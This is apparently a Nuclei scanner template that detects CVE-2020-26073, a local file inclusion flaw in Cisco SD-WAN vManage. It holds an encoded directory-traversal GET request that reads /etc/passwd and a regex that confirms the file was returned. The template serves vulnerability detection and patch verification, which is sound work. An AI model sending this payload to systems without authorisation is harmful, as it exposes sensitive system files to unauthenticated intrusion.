id: CVE-2020-26073

info:
  name: Cisco SD-WAN vManage Software - Local File Inclusion
  author: madrobot
  severity: high
  description: |
    Cisco SD-WAN vManage Software in the application data endpoints is vulnerable to local file inclusion which could allow an unauthenticated, remote attacker to gain access to sensitive information.
  impact: |
    An attacker can exploit this vulnerability to read sensitive files on the affected system.
  remediation: |
    Apply the latest security patches provided by Cisco to fix the vulnerability.
  reference:
    - https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-vman-traversal-hQh24tmk.html
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26073
  classification:
    cve-id: CVE-2020-26073
  metadata:
    max-request: 1
  tags: cve,cve2020,cisco,lfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: regex
        regex:
          - "root:.*:0:0:"
        part: body
# digest: 4b0a0048304602210093b5325073f2c8cc6afd564686b47d297156183c850c1bd644f37e142ab542cf022100df13c84724cfdc148ed72097e25053bc533f89889ef1eecf91d114ba505f5673:922c64590222798bb761d5b6d8e72950